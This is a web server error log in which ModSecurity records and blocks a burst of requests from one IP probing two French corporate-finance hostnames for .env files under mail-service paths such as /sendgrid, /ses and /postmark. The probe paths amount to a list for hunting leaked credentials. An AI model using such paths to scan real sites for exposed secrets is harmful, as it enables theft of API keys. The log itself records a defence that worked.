[Mon May 11 16:26:56.310988 2026] [security2:error] [pid 1411201:tid 1411253] [client 18.180.54.2:35922] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /notify/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/notify/.env"] [unique_id "agHnMPy_GXSWIKeli0vynAAAAIc"]
[Mon May 11 16:26:56.311229 2026] [security2:error] [pid 1411201:tid 1411253] [client 18.180.54.2:35922] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/notify/.env"] [unique_id "agHnMPy_GXSWIKeli0vynAAAAIc"]
[Mon May 11 16:26:56.311706 2026] [core:error] [pid 1411201:tid 1411253] [client 18.180.54.2:35922] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:56.311862 2026] [security2:error] [pid 1411201:tid 1411253] [client 18.180.54.2:35922] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/notify/.env"] [unique_id "agHnMPy_GXSWIKeli0vynAAAAIc"]
[Mon May 11 16:26:56.443845 2026] [security2:error] [pid 1412074:tid 1412100] [client 18.180.54.2:35934] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /campaign/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/campaign/.env"] [unique_id "agHnMDJnyuKVXoStDha1QwAAAFg"]
[Mon May 11 16:26:56.444076 2026] [security2:error] [pid 1412074:tid 1412100] [client 18.180.54.2:35934] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/campaign/.env"] [unique_id "agHnMDJnyuKVXoStDha1QwAAAFg"]
[Mon May 11 16:26:56.444569 2026] [core:error] [pid 1412074:tid 1412100] [client 18.180.54.2:35934] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:56.444741 2026] [security2:error] [pid 1412074:tid 1412100] [client 18.180.54.2:35934] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/campaign/.env"] [unique_id "agHnMDJnyuKVXoStDha1QwAAAFg"]
[Mon May 11 16:26:57.036033 2026] [security2:error] [pid 1411055:tid 1411073] [client 18.180.54.2:35936] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sender/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/sender/.env"] [unique_id "agHnMUWKUxpmnkK7zHx8UAAAARA"]
[Mon May 11 16:26:57.036283 2026] [security2:error] [pid 1411055:tid 1411073] [client 18.180.54.2:35936] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/sender/.env"] [unique_id "agHnMUWKUxpmnkK7zHx8UAAAARA"]
[Mon May 11 16:26:57.036804 2026] [core:error] [pid 1411055:tid 1411073] [client 18.180.54.2:35936] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:57.036964 2026] [security2:error] [pid 1411055:tid 1411073] [client 18.180.54.2:35936] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/sender/.env"] [unique_id "agHnMUWKUxpmnkK7zHx8UAAAARA"]
[Mon May 11 16:26:57.137371 2026] [security2:error] [pid 1416109:tid 1416140] [client 18.180.54.2:35940] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /newsletter/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/newsletter/.env"] [unique_id "agHnMVV4kyjgo4bQBUhUxAAAAMo"]
[Mon May 11 16:26:57.137614 2026] [security2:error] [pid 1416109:tid 1416140] [client 18.180.54.2:35940] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/newsletter/.env"] [unique_id "agHnMVV4kyjgo4bQBUhUxAAAAMo"]
[Mon May 11 16:26:57.138090 2026] [core:error] [pid 1416109:tid 1416140] [client 18.180.54.2:35940] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:57.138264 2026] [security2:error] [pid 1416109:tid 1416140] [client 18.180.54.2:35940] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/newsletter/.env"] [unique_id "agHnMVV4kyjgo4bQBUhUxAAAAMo"]
[Mon May 11 16:26:57.747206 2026] [security2:error] [pid 1411201:tid 1411268] [client 18.180.54.2:35950] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /campaign/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/campaign/.env"] [unique_id "agHnMfy_GXSWIKeli0vynwAAAJc"]
[Mon May 11 16:26:57.747436 2026] [security2:error] [pid 1411201:tid 1411268] [client 18.180.54.2:35950] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/campaign/.env"] [unique_id "agHnMfy_GXSWIKeli0vynwAAAJc"]
[Mon May 11 16:26:57.747989 2026] [core:error] [pid 1411201:tid 1411268] [client 18.180.54.2:35950] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:57.748150 2026] [security2:error] [pid 1411201:tid 1411268] [client 18.180.54.2:35950] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/campaign/.env"] [unique_id "agHnMfy_GXSWIKeli0vynwAAAJc"]
[Mon May 11 16:26:57.824515 2026] [security2:error] [pid 1416109:tid 1416154] [client 18.180.54.2:35958] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /ses/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/ses/.env"] [unique_id "agHnMVV4kyjgo4bQBUhUyAAAANg"]
[Mon May 11 16:26:57.824715 2026] [security2:error] [pid 1416109:tid 1416154] [client 18.180.54.2:35958] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/ses/.env"] [unique_id "agHnMVV4kyjgo4bQBUhUyAAAANg"]
[Mon May 11 16:26:57.825203 2026] [core:error] [pid 1416109:tid 1416154] [client 18.180.54.2:35958] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:57.825355 2026] [security2:error] [pid 1416109:tid 1416154] [client 18.180.54.2:35958] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/ses/.env"] [unique_id "agHnMVV4kyjgo4bQBUhUyAAAANg"]
[Mon May 11 16:26:58.466592 2026] [security2:error] [pid 1416109:tid 1416133] [client 18.180.54.2:35968] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /newsletter/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/newsletter/.env"] [unique_id "agHnMlV4kyjgo4bQBUhUywAAAMM"]
[Mon May 11 16:26:58.466913 2026] [security2:error] [pid 1416109:tid 1416133] [client 18.180.54.2:35968] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/newsletter/.env"] [unique_id "agHnMlV4kyjgo4bQBUhUywAAAMM"]
[Mon May 11 16:26:58.467688 2026] [core:error] [pid 1416109:tid 1416133] [client 18.180.54.2:35968] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:58.467918 2026] [security2:error] [pid 1416109:tid 1416133] [client 18.180.54.2:35968] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/newsletter/.env"] [unique_id "agHnMlV4kyjgo4bQBUhUywAAAMM"]
[Mon May 11 16:26:58.507759 2026] [security2:error] [pid 1412074:tid 1412083] [client 18.180.54.2:54044] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sendgrid/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/sendgrid/.env"] [unique_id "agHnMjJnyuKVXoStDha1SQAAAEc"]
[Mon May 11 16:26:58.507980 2026] [security2:error] [pid 1412074:tid 1412083] [client 18.180.54.2:54044] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/sendgrid/.env"] [unique_id "agHnMjJnyuKVXoStDha1SQAAAEc"]
[Mon May 11 16:26:58.508518 2026] [core:error] [pid 1412074:tid 1412083] [client 18.180.54.2:54044] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:58.508679 2026] [security2:error] [pid 1412074:tid 1412083] [client 18.180.54.2:54044] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/sendgrid/.env"] [unique_id "agHnMjJnyuKVXoStDha1SQAAAEc"]
[Mon May 11 16:26:59.173387 2026] [security2:error] [pid 1412074:tid 1412094] [client 18.180.54.2:54052] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /ses/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/ses/.env"] [unique_id "agHnMzJnyuKVXoStDha1TAAAAFI"]
[Mon May 11 16:26:59.173613 2026] [security2:error] [pid 1412074:tid 1412094] [client 18.180.54.2:54052] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/ses/.env"] [unique_id "agHnMzJnyuKVXoStDha1TAAAAFI"]
[Mon May 11 16:26:59.174090 2026] [core:error] [pid 1412074:tid 1412094] [client 18.180.54.2:54052] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:59.174800 2026] [security2:error] [pid 1412074:tid 1412094] [client 18.180.54.2:54052] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/ses/.env"] [unique_id "agHnMzJnyuKVXoStDha1TAAAAFI"]
[Mon May 11 16:26:59.228812 2026] [security2:error] [pid 1411055:tid 1411066] [client 18.180.54.2:54064] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sparkpost/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/sparkpost/.env"] [unique_id "agHnM0WKUxpmnkK7zHx8VwAAAQk"]
[Mon May 11 16:26:59.229039 2026] [security2:error] [pid 1411055:tid 1411066] [client 18.180.54.2:54064] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/sparkpost/.env"] [unique_id "agHnM0WKUxpmnkK7zHx8VwAAAQk"]
[Mon May 11 16:26:59.229569 2026] [core:error] [pid 1411055:tid 1411066] [client 18.180.54.2:54064] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:59.229719 2026] [security2:error] [pid 1411055:tid 1411066] [client 18.180.54.2:54064] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/sparkpost/.env"] [unique_id "agHnM0WKUxpmnkK7zHx8VwAAAQk"]
[Mon May 11 16:26:59.858925 2026] [security2:error] [pid 1412074:tid 1412076] [client 18.180.54.2:54070] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sendgrid/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/sendgrid/.env"] [unique_id "agHnMzJnyuKVXoStDha1TQAAAEA"]
[Mon May 11 16:26:59.859195 2026] [security2:error] [pid 1412074:tid 1412076] [client 18.180.54.2:54070] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/sendgrid/.env"] [unique_id "agHnMzJnyuKVXoStDha1TQAAAEA"]
[Mon May 11 16:26:59.859680 2026] [core:error] [pid 1412074:tid 1412076] [client 18.180.54.2:54070] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:59.859952 2026] [security2:error] [pid 1412074:tid 1412076] [client 18.180.54.2:54070] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/sendgrid/.env"] [unique_id "agHnMzJnyuKVXoStDha1TQAAAEA"]
[Mon May 11 16:26:59.934310 2026] [security2:error] [pid 1411055:tid 1411078] [client 18.180.54.2:54072] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /postmark/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/postmark/.env"] [unique_id "agHnM0WKUxpmnkK7zHx8WAAAARU"]
[Mon May 11 16:26:59.934526 2026] [security2:error] [pid 1411055:tid 1411078] [client 18.180.54.2:54072] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/postmark/.env"] [unique_id "agHnM0WKUxpmnkK7zHx8WAAAARU"]
[Mon May 11 16:26:59.935001 2026] [core:error] [pid 1411055:tid 1411078] [client 18.180.54.2:54072] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
